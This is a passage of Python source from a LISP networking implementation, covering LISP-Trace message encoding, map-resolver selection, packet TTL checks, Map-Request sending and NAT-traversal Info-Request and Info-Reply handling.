# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
    """Encoder/decoder and forwarding helper for LISP-Trace messages
    (type 9, format pictured in the comment block above). The JSON
    payload accumulates one entry per hop in packet_json."""
    def __init__(self):
        self.nonce = lisp_get_control_nonce()
        self.packet_json = []         # list of per-hop JSON dicts
        self.local_rloc = None        # decoded local private IPv4 RLOC
        self.local_port = None        # decoded local private port (string)
        self.lisp_socket = None
    #enddef
    def print_trace(self):
        """Log the current JSON trace payload."""
        jd = self.packet_json
        lprint("LISP-Trace JSON: '{}'".format(jd))
    #enddef
    def encode(self):
        """Build the on-wire message: first long is type 9 in the top
        nibble (port field left 0), then a zero address, the 64-bit
        nonce, and the JSON payload."""
        first_long = socket.htonl(0x90000000)
        packet = struct.pack("II", first_long, 0)
        packet += struct.pack("Q", self.nonce)
        packet += json.dumps(self.packet_json)
        return(packet)
    #enddef
    def decode(self, packet):
        """Parse an on-wire LISP-Trace message into this instance.
        Returns False on any truncation, wrong type nibble, or bad
        JSON; True otherwise. A message may legally end right after
        the nonce (no JSON yet)."""
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)
        first_long = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        first_long = socket.ntohl(first_long)
        if ((first_long & 0xff000000) != 0x90000000): return(False)
        if (len(packet) < format_size): return(False)
        addr = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        addr = socket.ntohl(addr)
        # Unpack the IPv4 local RLOC a byte at a time into dotted-quad.
        v1 = addr >> 24
        v2 = (addr >> 16) & 0xff
        v3 = (addr >> 8) & 0xff
        v4 = addr & 0xff
        self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
        self.local_port = str(first_long & 0xffff)
        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)
        self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (len(packet) == 0): return(True)
        try:
            self.packet_json = json.loads(packet)
        except:
            return(False)
        #endtry
        return(True)
    #enddef
    def myeid(self, eid):
        """True when 'eid' is one of this xTR's own EIDs."""
        return(lisp_is_myeid(eid))
    #enddef
    def return_to_sender(self, lisp_socket, rts_rloc, packet):
        """Send the trace back to its originator. Prefer a cached NAT
        translation of 'rts_rloc' ("addr:port" string); otherwise use
        the address literally. A fresh socket bound to LISP_TRACE_PORT
        is used when the caller supplies none."""
        rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
        if (rloc == None):
            rloc, port = rts_rloc.split(":")
            port = int(port)
            lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
        else:
            lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
                port))
        #endif
        if (lisp_socket == None):
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.bind(("0.0.0.0", LISP_TRACE_PORT))
            s.sendto(packet, (rloc, port))
            s.close()
        else:
            lisp_socket.sendto(packet, (rloc, port))
        #endif
    #enddef
    def packet_length(self):
        """Length of UDP header plus trace header plus JSON payload."""
        udp = 8; trace = 4 + 4 + 8
        return(udp + trace + len(json.dumps(self.packet_json)))
    #enddef
    def rtr_cache_nat_trace(self, translated_rloc, translated_port):
        """Remember the NAT translation for this trace's local
        RLOC:port so replies can be returned through the NAT."""
        key = self.local_rloc + ":" + self.local_port
        value = (translated_rloc, translated_port)
        lisp_rtr_nat_trace_cache[key] = value
        lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
    #enddef
    def rtr_cache_nat_trace_find(self, local_rloc_and_port):
        """Look up a cached NAT translation; (None, None) on miss."""
        key = local_rloc_and_port
        try: value = lisp_rtr_nat_trace_cache[key]
        except: value = (None, None)
        return(value)
    #enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
    """Return the lisp_ms() whose map-server address exactly matches
    'address' (a lisp_address() instance), or None when no configured
    map-server matches."""
    for entry in lisp_map_servers_list.values():
        if (entry.map_server.is_exact_match(address) == False): continue
        return(entry)
    #endfor
    return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
    """Return an arbitrary (first) configured lisp_ms() instance, or
    None when no map-servers are configured."""
    return(next(iter(lisp_map_servers_list.values()), None))
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
    """Select a map-resolver.

    When 'address' is supplied, return the configured map-resolver
    whose key contains that address (None on no match). Otherwise pick
    by 'eid': "" means any mr-name (first match), None means mr-name
    "all", and a lisp_address() means use the mr-name from its
    database-mapping. Among candidates the least-recently-used one
    (smallest last_used) is returned.
    """
    if (address != None):
        addr = address.print_address()
        mr = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr) == -1): continue
            mr = lisp_map_resolvers_list[key]
        #endfor
        return(mr)
    #endif
    #
    # Get database-mapping entry to find out which map-resolver name set we
    # should use, or pick one from a non-configured mr-name list. Or, get the
    # first one for info-requests.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name
    #endif
    older = None
    for mr in lisp_map_resolvers_list.values():
        if (mr_name == ""): return(mr)
        if (mr.mr_name != mr_name): continue
        # Track the least recently used matching map-resolver.
        if (older == None or mr.last_used < older.last_used): older = mr
    #endfor
    return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
    """Pick the map-resolver for 'eid' using the LISP-Decent pull
    mapping-system algorithm: hash the EID into an index, form the DNS
    name "<index>.<decent-dns-suffix>", and return the least recently
    used map-resolver carrying that DNS name (None if none match)."""
    dns_name = str(lisp_get_decent_index(eid)) + "." + lisp_decent_dns_suffix
    lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
        bold(dns_name, False), eid.print_prefix()))
    lru = None
    for mr in lisp_map_resolvers_list.values():
        if (mr.dns_name != dns_name): continue
        if (lru == None or mr.last_used < lru.last_used): lru = mr
    #endfor
    return(lru)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
    """Input-check a received IPv4 packet before encapsulation.

    'packet' is the raw IPv4 header plus payload as a byte-string
    (Python 2 str; ord() is applied to single bytes). Returns a
    two-element list:
      [True, packet]  - packet is IGMP (protocol 2), pass through as-is
      [False, None]   - drop (bad header checksum, ttl 0, or ttl expiry)
      [False, packet] - packet with TTL decremented and header checksum
                        recomputed, ready to encapsulate
    """
    #
    # Check IGMP packet first. And don't do IP checksum and don't test TTL.
    #
    if (ord(packet[9]) == 2): return([True, packet])
    #
    # Now calculate checksum for verification.
    #
    checksum = struct.unpack("H", packet[10:12])[0]
    if (checksum == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        # Recomputing the checksum over a valid header yields 0 in the
        # checksum field; anything else means corruption.
        packet = lisp_ip_checksum(packet)
        checksum = struct.unpack("H", packet[10:12])[0]
        if (checksum != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return([False, None])
        #endif
    #endif
    #
    # Now check TTL and if not 0, recalculate checksum and return to
    # encapsulate.
    #
    ttl = struct.unpack("B", packet[8:9])[0]
    if (ttl == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return([False, None])
    elif (ttl == 1):
        dprint("IPv4 packet {}, packet discarded".format( \
            bold("ttl expiry", False)))
        return([False, None])
    #endif
    # Decrement TTL, zero the checksum field, then recompute it.
    ttl -= 1
    packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
    """Input-check a received IPv6 packet before encapsulation.

    'packet' is an object carrying the parsed destination in
    .inner_dest and the raw bytes in .packet. Returns the raw packet
    with hop-limit decremented, or None to drop (hop-limit 0 or 1, or
    a link-local destination which must not go on the overlay). IPv6
    has no header checksum, so only the hop-limit is rewritten.
    """
    dest = packet.inner_dest
    packet = packet.packet
    #
    # Now check TTL and if not 0, recalculate checksum and return to
    # encapsulate.
    #
    ttl = struct.unpack("B", packet[7:8])[0]
    if (ttl == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return(None)
    elif (ttl == 1):
        dprint("IPv6 packet {}, packet discarded".format( \
            bold("ttl expiry", False)))
        return(None)
    #endif
    #
    # Check for IPv6 link-local addresses. They should not go on overlay.
    #
    if (dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return(None)
    #endif
    ttl -= 1
    packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
    return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
    """Input-check a MAC frame. L2 frames carry no TTL or header
    checksum to validate, so the frame is returned unchanged."""
    return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
    """Return True when a data-triggered Map-Request was sent within
    the last LISP_MAP_REQUEST_RATE_LIMIT seconds (i.e. the caller
    should suppress this one); False when it is okay to send."""
    if (lisp_last_map_request_sent == None): return(False)
    elapsed = lisp_get_timestamp() - lisp_last_map_request_sent
    if (elapsed >= LISP_MAP_REQUEST_RATE_LIMIT): return(False)
    printable_source = source.print_address() if (source != None) else None
    dprint("Rate-limiting Map-Request for {} -> {}".format(printable_source,
        dest.print_address()))
    return(True)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
    """Build and send a Map-Request for EID 'deid' (source-EID 'seid').

    When 'rloc' is supplied the request is an RLOC-probe sent directly
    to that RLOC (data-encapsulated when the RLOC is behind a NAT);
    otherwise it is sent as an ECM to the least-recently-used
    map-resolver. Updates the global rate-limit timestamp
    lisp_last_map_request_sent on the map-resolver path. Returns None.
    """
    global lisp_last_map_request_sent
    #
    # Set RLOC-probe parameters if caller wants Map-Request to be an
    # RLOC-probe. We use probe_port as 4341 so that the ITR and RTR keying
    # data structures can be the same.
    #
    probe_dest = probe_port = None
    if (rloc):
        probe_dest = rloc.rloc
        probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
    #endif
    #
    # If there are no RLOCs found, do not build and send the Map-Request.
    #
    itr_rloc4, itr_rloc6, device = lisp_myrlocs
    if (itr_rloc4 == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return
    #endif
    if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return
    #endif
    map_request = lisp_map_request()
    map_request.record_count = 1
    map_request.nonce = lisp_get_control_nonce()
    map_request.rloc_probe = (probe_dest != None)
    #
    # Hold request nonce so we can match replies from xTRs that have multiple
    # RLOCs. Reason being is because source address may not be the probed
    # destination. And on our ETR implementation, we can get the probe request
    # destination in the lisp-core/lisp-etr/lisp-rtr processes.
    #
    if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
    # For an (S,G) lookup, the source goes in target_eid and the group
    # in target_group.
    sg = deid.is_multicast_address()
    if (sg):
        map_request.target_eid = seid
        map_request.target_group = deid
    else:
        map_request.target_eid = deid
    #endif
    #
    # If lookup is for an IPv6 EID or there is a signature key configured and
    # there is a private key file in current directory, tell lisp_map_request()
    # to sign Map-Request. For an RTR, we want to verify its map-request
    # signature, so it needs to include its own IPv6 EID that matches the
    # private-key file.
    #
    if (map_request.rloc_probe == False):
        db = lisp_get_signature_eid()
        if (db):
            map_request.signature_eid.copy_address(db.eid)
            map_request.privkey_filename = "./lisp-sig.pem"
        #endif
    #endif
    #
    # Fill in source-eid field.
    #
    if (seid == None or sg):
        map_request.source_eid.afi = LISP_AFI_NONE
    else:
        map_request.source_eid = seid
    #endif
    #
    # If ITR-RLOC is a private IPv4 address, we need it to be a global address
    # for RLOC-probes.
    #
    # However, if we are an RTR and have a private address, the RTR is behind
    # a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
    # through NAT. The ETR receiving the RLOC-probe request must return the
    # RLOC-probe reply with same translated address/port pair (the same values
    # when it encapsulates data packets).
    #
    if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
        if (probe_dest.is_private_address() == False):
            itr_rloc4 = lisp_get_any_translated_rloc()
        #endif
        if (itr_rloc4 == None):
            lprint("Suppress sending Map-Request, translated RLOC not found")
            return
        #endif
    #endif
    #
    # Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
    # nothing to store in the ITR-RLOCs list. And we have to use an inner
    # source address of 0::0.
    #
    if (probe_dest == None or probe_dest.is_ipv4()):
        if (lisp_nat_traversal and probe_dest == None):
            ir = lisp_get_any_translated_rloc()
            if (ir != None): itr_rloc4 = ir
        #endif
        map_request.itr_rlocs.append(itr_rloc4)
    #endif
    if (probe_dest == None or probe_dest.is_ipv6()):
        if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
            itr_rloc6 = None
        else:
            map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
            map_request.itr_rlocs.append(itr_rloc6)
        #endif
    #endif
    #
    # Decide what inner source address needs to be for the ECM. We have to
    # look at the address-family of the destination EID. If the destination-EID
    # is a MAC address, we will use IPv4 in the inner header with a destination
    # address of 0.0.0.0.
    #
    if (probe_dest != None and map_request.itr_rlocs != []):
        itr_rloc = map_request.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            itr_rloc = itr_rloc4
        elif (deid.is_ipv6()):
            itr_rloc = itr_rloc6
        else:
            itr_rloc = itr_rloc4
        #endif
    #endif
    #
    # And finally add one EID record. The EID we are looking up.
    #
    packet = map_request.encode(probe_dest, probe_port)
    map_request.print_map_request()
    #
    # If this is an RLOC-probe, send directly to RLOC and not to mapping
    # system. If the RLOC is behind a NAT, we need to data encapsulate it
    # from port 4341 to translated destination address and port.
    #
    if (probe_dest != None):
        if (rloc.is_rloc_translated()):
            nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
            #
            # Handle gleaned RLOC case.
            #
            if (nat_info == None):
                r = rloc.rloc.print_address_no_iid()
                g = "gleaned-{}".format(r)
                p = rloc.translated_port
                nat_info = lisp_nat_info(r, g, p)
            #endif
            lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
                packet)
            return
        #endif
        addr_str = probe_dest.print_address_no_iid()
        dest = lisp_convert_4to6(addr_str)
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        return
    #endif
    #
    # Get least recently used Map-Resolver. In the RTR make sure there is a
    # Map-Resolver in lisp.config with no mr-name or mr-name=all.
    #
    local_eid = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        mr = lisp_get_decent_map_resolver(deid)
    else:
        mr = lisp_get_map_resolver(None, local_eid)
    #endif
    if (mr == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format( \
            green(seid.print_address(), False)))
        return
    #endif
    mr.last_used = lisp_get_timestamp()
    mr.map_requests_sent += 1
    if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
    #
    # Send ECM based Map-Request to Map-Resolver.
    #
    if (seid == None): seid = itr_rloc
    lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
        mr.map_resolver)
    #
    # Set global timestamp for rate-limiting.
    #
    lisp_last_map_request_sent = lisp_get_timestamp()
    #
    # Do DNS lookup for Map-Resolver if "dns-name" configured.
    #
    mr.resolve_dns_name()
    return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
    """Build and send a NAT-traversal Info-Request to 'dest' on 'port'.

    'port' is LISP_CTRL_PORT (4342) for a map-server (control) or
    LISP_DATA_PORT (4341) for an RTR (data); data-port requests are
    prepended with a LISP data header (instance-id 0xffffff). When
    'device_name' is given, a temporary host route to 'dest' via that
    device's default-route next-hop is installed so the request egresses
    the intended interface, and is removed again before returning.
    Returns None.
    """
    #
    # Build Info-Request message.
    #
    info = lisp_info()
    info.nonce = lisp_get_control_nonce()
    if (device_name): info.hostname += "-" + device_name
    addr_str = dest.print_address_no_iid()
    #
    # Find next-hop for interface 'device_name' if supplied. The "ip route"
    # command will produce this:
    #
    # pi@lisp-pi ~/lisp $ ip route | egrep "default via"
    # default via 192.168.1.1 dev eth1
    # default via 192.168.1.1 dev wlan0
    #
    # We then turn the line we want into a "ip route add" command. Then at
    # the end of this function we remove the route.
    #
    # We do this on the ETR only so we don't have Info-Requests from the lisp-
    # itr and lisp-etr process both add and delete host routes (for Info-
    # Request sending purposes) at the same time.
    #
    added_route = False
    if (device_name):
        save_nh = lisp_get_host_route_next_hop(addr_str)
        #
        # If we found a host route for the map-server, then both the lisp-itr
        # and lisp-etr processes are in this routine at the same time.
        # wait for the host route to go away before proceeding. We will use
        # the map-server host route as a IPC lock. For the data port, only
        # the lisp-etr processes will add host route to the RTR for Info-
        # Requests.
        #
        if (port == LISP_CTRL_PORT and save_nh != None):
            while (True):
                time.sleep(.01)
                save_nh = lisp_get_host_route_next_hop(addr_str)
                if (save_nh == None): break
            #endwhile
        #endif
        default_routes = lisp_get_default_route_next_hops()
        for device, nh in default_routes:
            if (device != device_name): continue
            #
            # If there is a data route pointing to same next-hop, don't
            # change the routing table. Otherwise, remove saved next-hop,
            # add the one we want and later undo this.
            #
            if (save_nh != nh):
                if (save_nh != None):
                    lisp_install_host_route(addr_str, save_nh, False)
                #endif
                lisp_install_host_route(addr_str, nh, True)
                added_route = True
            #endif
            break
        #endfor
    #endif
    #
    # Encode the Info-Request message and print it.
    #
    packet = info.encode()
    info.print_info()
    #
    # Send it.
    #
    cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
    cd = bold(cd, False)
    p = bold("{}".format(port), False)
    a = red(addr_str, False)
    rtr = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
    #
    # Send packet to control port via control-sockets interface. For a 4341
    # do the same via the lisp-core process but prepend a LISP data header
    # to the message.
    #
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    else:
        header = lisp_data_header()
        header.instance_id(0xffffff)
        header = header.encode()
        if (header):
            packet = header + packet
            #
            # The NAT-traversal spec says to use port 4342 as the source port
            # but that would mean return data packets will go to the lisp-core
            # process. We are going to use an ephemeral port here so packets
            # come to this lisp-etr process. The commented out call is to
            # allow Info-Requests to use source port 4342 but will break the
            # data-plane in this lispers.net implementation.
            #
            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
#           lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
        #endif
    #endif
    #
    # Remove static route to RTR if had added one and restore data route.
    # Note 'save_nh' is only bound when device_name was supplied, which is
    # the only way added_route can be True.
    #
    if (added_route):
        lisp_install_host_route(addr_str, None, False)
        if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
    #endif
    return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
    """Process a received Info-Request and reply with an Info-Reply.

    'addr_str'/'sport' are the (possibly NAT-translated) source address
    and port of the request; they are echoed back in the reply so the
    sender learns its global RLOC and translated port. 'rtr_list' (may
    be None) is the RTR set to advertise. Also caches the sender as an
    info-source so Map-Requests from it can be proxied when it is
    behind a NAT. Returns None.
    """
    #
    # Parse Info-Request so we can return the nonce in the Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()
    #
    # Start building the Info-Reply. Copy translated source and translated
    # source port from Info-Request.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport
    #
    # Put Info-Request hostname (if it was encoded) in private-rloc in
    # Info-Reply. Encode it as an AFI=17 distinguished-name.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)
    #endif
    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()
    #
    # Send the Info-Reply via the lisp-core process. We are sending from
    # a udp46 socket, so we need to prepend ::ffff.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)
    #
    # Cache info sources so we can decide to process Map-Requests from it
    # specially so we can proxy-Map-Request when the sources are behind NATs.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
    """Scan lisp_db_list (database-mappings) and return the first entry
    flagged as a signature-EID, or None when none is configured."""
    matches = [db for db in lisp_db_list if db.signature_eid]
    return(matches[0] if matches else None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
    """Return the first NAT-translated port found in any database-
    mapping RLOC entry, or None. Used as the inner UDP port for ECM
    Map-Requests."""
    for db in lisp_db_list:
        for entry in db.rloc_set:
            if (entry.translated_rloc.is_null() == False):
                return(entry.translated_port)
            #endif
        #endfor
    #endfor
    return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
    """Return the first NAT-translated RLOC found in any database-
    mapping RLOC entry, or None. Needed for RLEs in (S,G)
    Map-Registers when the ETR sits behind a NAT."""
    for db in lisp_db_list:
        for entry in db.rloc_set:
            if (entry.translated_rloc.is_null() == False):
                return(entry.translated_rloc)
            #endif
        #endfor
    #endfor
    return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
    """Return a list of every NAT-translated RLOC address across all
    database-mappings, each in printed string form."""
    return([entry.translated_rloc.print_address_no_iid()
        for db in lisp_db_list for entry in db.rloc_set
        if entry.is_rloc_translated()])
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    """Install/refresh default map-cache entries pointing at the RTR set.

    Called on an ITR when the map-server returns a new 'rtr_list'
    (dict of printed-address -> lisp_address). For each AFI (IPv4,
    IPv6, and MAC when L2 overlay is enabled) the unicast and multicast
    default entries under instance-id 'iid' are deleted and re-added
    with the RTRs as the RLOC-set (priority 254). Entries whose
    RLOC-set already matches are left alone. Returns None.
    """
    # Honor LISP_RTR_BEHIND_NAT by dropping private RTR addresses.
    ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
    new_rtr_list = {}
    for rloc in rtr_list:
        if (rloc == None): continue
        addr = rtr_list[rloc]
        if (ignore_private and addr.is_private_address()): continue
        new_rtr_list[rloc] = addr
    #endfor
    rtr_list = new_rtr_list
    prefix_list = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
        #
        # Do unicast routes. We assume unicast and multicast routes are sync'ed
        # with the same RLOC-set.
        #
        prefix = lisp_address(afi, "", 0, iid)
        prefix.make_default_route(prefix)
        mc = lisp_map_cache.lookup_cache(prefix, True)
        if (mc):
            if (mc.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format( \
                    green(mc.print_eid_tuple(), False)))
            elif (mc.do_rloc_sets_match(rtr_list.values())):
                continue
            #endif
            mc.delete_cache()
        #endif
        prefix_list.append([prefix, ""])
        #
        # Do multicast routes.
        #
        group = lisp_address(afi, "", 0, iid)
        group.make_default_multicast_route(group)
        gmc = lisp_map_cache.lookup_cache(group, True)
        if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
        if (gmc): gmc.delete_cache()
        prefix_list.append([prefix, group])
    #endfor
    if (len(prefix_list) == 0): return
    #
    # Build RLOC-set.
    #
    rloc_set = []
    for rtr in rtr_list:
        rtr_addr = rtr_list[rtr]
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(rtr_addr)
        rloc_entry.priority = 254
        rloc_entry.mpriority = 255
        rloc_entry.rloc_name = "RTR"
        rloc_set.append(rloc_entry)
    #endfor
    for prefix in prefix_list:
        mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
        mc.mapping_source = map_resolver
        mc.map_cache_ttl = LISP_MR_TTL * 60
        mc.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
            green(mc.print_eid_tuple(), False), rtr_list.keys()))
        # Each map-cache entry needs its own copy of the RLOC-set.
        rloc_set = copy.deepcopy(rloc_set)
    #endfor
    return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
    """Process a received Info-Reply message.

    Records any newly learned RTRs in lisp_rtr_list (and, on an ITR,
    refreshes the default map-cache routes when the RTR set changed).
    When 'store' is True, the reply's global RLOC and translated port
    are written into matching database-mapping RLOC entries.

    Returns [global-rloc-address, translated-port-number, new_rtr_set];
    the first two are None on a decode failure.
    """
    #
    # Parse Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return([None, None, False])
    info.print_info()
    #
    # Store RTR list.
    #
    new_rtr_set = False
    for rtr in info.rtr_list:
        addr_str = rtr.print_address_no_iid()
        if (lisp_rtr_list.has_key(addr_str)):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[addr_str] != None): continue
        #endif
        new_rtr_set = True
        lisp_rtr_list[addr_str] = rtr
    #endfor
    #
    # If an ITR, install default map-cache entries.
    #
    if (lisp_i_am_itr and new_rtr_set):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
        else:
            for iid in lisp_iid_to_interface.keys():
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)
            #endfor
        #endif
    #endif
    #
    # Either store in database-mapping entries or return to caller.
    #
    if (store == False):
        return([info.global_etr_rloc, info.etr_port, new_rtr_set])
    #endif
    #
    # If no private-etr-rloc was supplied in the Info-Reply, use the global
    # RLOC for all private RLOCs in the database-mapping entries.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                # Address-configured RLOC: it must be a local address and
                # match the reply's private RLOC when one was supplied.
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue
                #endif
            elif (info.private_etr_rloc.is_dist_name()):
                # Interface-configured RLOC matched by rloc-name.
                rloc_name = info.private_etr_rloc.address
                if (rloc_name != rloc_entry.rloc_name): continue
            #endif
            eid_str = green(db.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)
            rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and rlocs_match):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue
            #endif
            #
            # Nothing changed?
            #
            translated = info.global_etr_rloc
            stored = rloc_entry.translated_rloc
            if (stored.is_exact_match(translated) and
                info.etr_port == rloc_entry.translated_port): continue
            lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
                format(red(info.global_etr_rloc.print_address_no_iid(), False),
                info.etr_port, rloc_str, interface, eid_str))
            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)
        #endfor
    #endfor
